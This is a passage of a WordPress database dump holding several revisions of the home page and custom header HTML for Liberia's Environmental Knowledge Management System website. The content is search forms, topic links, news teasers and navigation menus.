Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 16:20:59','2019-11-27 16:20:59','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2851,1,'2019-11-27 16:22:39','2019-11-27 16:22:39','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 16:22:39','2019-11-27 16:22:39','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2852,1,'2019-11-27 16:27:33','2019-11-27 16:27:33','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 16:27:33','2019-11-27 16:27:33','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2853,1,'2019-11-27 16:29:19','2019-11-27 16:29:19','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									<p>Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?</p>\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 16:29:19','2019-11-27 16:29:19','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2854,1,'2019-11-27 20:10:05','0000-00-00 00:00:00','','header','','draft','closed','closed','','','','','2019-11-27 20:10:05','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=elementor_library&p=2854',0,'elementor_library','',0),(2855,1,'2019-11-27 20:14:18','2019-11-27 20:14:18','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS CloudDrive</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li><li><a href=\"#\"></a></li></ul>\n	<form method=\"get\" action=\"https://ekmsliberia.info/\">\n		<input type=\"search\" name=\"s\" autocomplete=\"off\" value=\"\" placeholder=\"Type then hit enter to search...\" />\n					</form>\n<!-- #searchform-header-replace -->\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a>Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a>Media &#038; Tools</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n	<li><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>\n	<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-27 20:14:18','2019-11-27 20:14:18','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2856,1,'2019-11-27 20:16:30','2019-11-27 20:16:30','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n		Join us to help grow the EKMS Community		\n			<a href=\"https://ekms-liberia.mn.co/\" target=\"_blank\" role=\"button\" rel=\"noopener noreferrer\">\n						Request to Join\n					</a>\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a>Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore All Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a>Media &#038; Tools </a>\n<ul>\n	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/news-and-blogs/\">News &#038; Blogs</a></li>	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">EKMS Bulletins</a></li>	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>	<li id=\"menu-item-2509\"><a href=\"https://ekmsliberia.info/join-the-community/\">Join the Community</a></li>	<li id=\"menu-item-2596\"><a target=\"_blank\" rel=\"noopener noreferrer\">Startup Online Meetings</a></li>	<li id=\"menu-item-2746\"><a target=\"_blank\" href=\"https://securedrive.ekmsliberia.info/\" rel=\"noopener noreferrer\">EKMS 